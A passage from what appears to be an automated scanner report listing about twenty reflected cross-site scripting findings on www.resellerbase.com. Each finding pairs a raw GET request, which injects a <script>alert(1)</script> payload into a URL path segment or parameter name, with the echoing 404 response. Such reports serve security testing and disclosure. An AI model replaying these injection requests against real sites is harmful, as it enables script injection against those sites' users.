User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/944966<script>alert(1)</script>5f0f1769aa3/themes/ was not found on this server.</p>
...[SNIP]...

2.3752. http://www.resellerbase.com/detail/9/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22109<script>alert(1)</script>fae4e3be4c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes22109<script>alert(1)</script>fae4e3be4c8/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes22109<script>alert(1)</script>fae4e3be4c8/ was not found on this server.</p>
...[SNIP]...

2.3753. http://www.resellerbase.com/detail/9/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f5691<script>alert(1)</script>e92533beb96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/?f5691<script>alert(1)</script>e92533beb96=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/?f5691<script>alert(1)</script>e92533beb96=1 was not found on this server.</p>
...[SNIP]...

2.3754. http://www.resellerbase.com/detail/9/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87e8f<script>alert(1)</script>82e789d8d15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail87e8f<script>alert(1)</script>82e789d8d15/9/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail87e8f<script>alert(1)</script>82e789d8d15/9/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3755. http://www.resellerbase.com/detail/9/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2fff5<script>alert(1)</script>ec7e616f677 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/92fff5<script>alert(1)</script>ec7e616f677/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/92fff5<script>alert(1)</script>ec7e616f677/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3756. http://www.resellerbase.com/detail/9/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1e8e<script>alert(1)</script>810a04b73b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themese1e8e<script>alert(1)</script>810a04b73b5/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themese1e8e<script>alert(1)</script>810a04b73b5/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3757. http://www.resellerbase.com/detail/9/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ccf7e<script>alert(1)</script>9e400ea698e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmosccf7e<script>alert(1)</script>9e400ea698e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmosccf7e<script>alert(1)</script>9e400ea698e/ was not found on this server.</p>
...[SNIP]...

2.3758. http://www.resellerbase.com/detail/9/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fe70f<script>alert(1)</script>693a56a8bc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/?fe70f<script>alert(1)</script>693a56a8bc6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/?fe70f<script>alert(1)</script>693a56a8bc6=1 was not found on this server.</p>
...[SNIP]...

2.3759. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa400<script>alert(1)</script>5391315d7d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaa400<script>alert(1)</script>5391315d7d5/9/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaa400<script>alert(1)</script>5391315d7d5/9/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3760. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 625bd<script>alert(1)</script>4d1598eb751 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9625bd<script>alert(1)</script>4d1598eb751/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9625bd<script>alert(1)</script>4d1598eb751/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3761. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 96c50<script>alert(1)</script>6c9b64cbc8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes96c50<script>alert(1)</script>6c9b64cbc8f/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes96c50<script>alert(1)</script>6c9b64cbc8f/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3762. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eed94<script>alert(1)</script>b9621764639 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmoseed94<script>alert(1)</script>b9621764639/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmoseed94<script>alert(1)</script>b9621764639/images/ was not found on this server.</p>
...[SNIP]...

2.3763. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 12b07<script>alert(1)</script>45c9801de69 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images12b07<script>alert(1)</script>45c9801de69/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images12b07<script>alert(1)</script>45c9801de69/ was not found on this server.</p>
...[SNIP]...

2.3764. http://www.resellerbase.com/detail/9/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c7a88<script>alert(1)</script>ab30268f0de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/?c7a88<script>alert(1)</script>ab30268f0de=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/?c7a88<script>alert(1)</script>ab30268f0de=1 was not found on this server.</p>
...[SNIP]...

2.3765. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c366<script>alert(1)</script>ccd78918ab1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2c366<script>alert(1)</script>ccd78918ab1/9/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2c366<script>alert(1)</script>ccd78918ab1/9/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3766. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf465<script>alert(1)</script>ddc2e85089f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9bf465<script>alert(1)</script>ddc2e85089f/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9bf465<script>alert(1)</script>ddc2e85089f/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3767. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 21679<script>alert(1)</script>c423102c26d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes21679<script>alert(1)</script>c423102c26d/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes21679<script>alert(1)</script>c423102c26d/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3768. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2568e<script>alert(1)</script>10002ef01dd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos2568e<script>alert(1)</script>10002ef01dd/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos2568e<script>alert(1)</script>10002ef01dd/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3769. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c85d5<script>alert(1)</script>50df8ab74ec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/imagesc85d5<script>alert(1)</script>50df8ab74ec/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/imagesc85d5<script>alert(1)</script>50df8ab74ec/rating/ was not found on this server.</p>
...[SNIP]...

2.3770. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2d260<script>alert(1)</script>1c8d1dcfd24 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating2d260<script>alert(1)</script>1c8d1dcfd24/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating2d260<script>alert(1)</script>1c8d1dcfd24/ was not found on this server.</p>
...[SNIP]...

2.3771. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 776e9<script>alert(1)</script>572cc55018e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

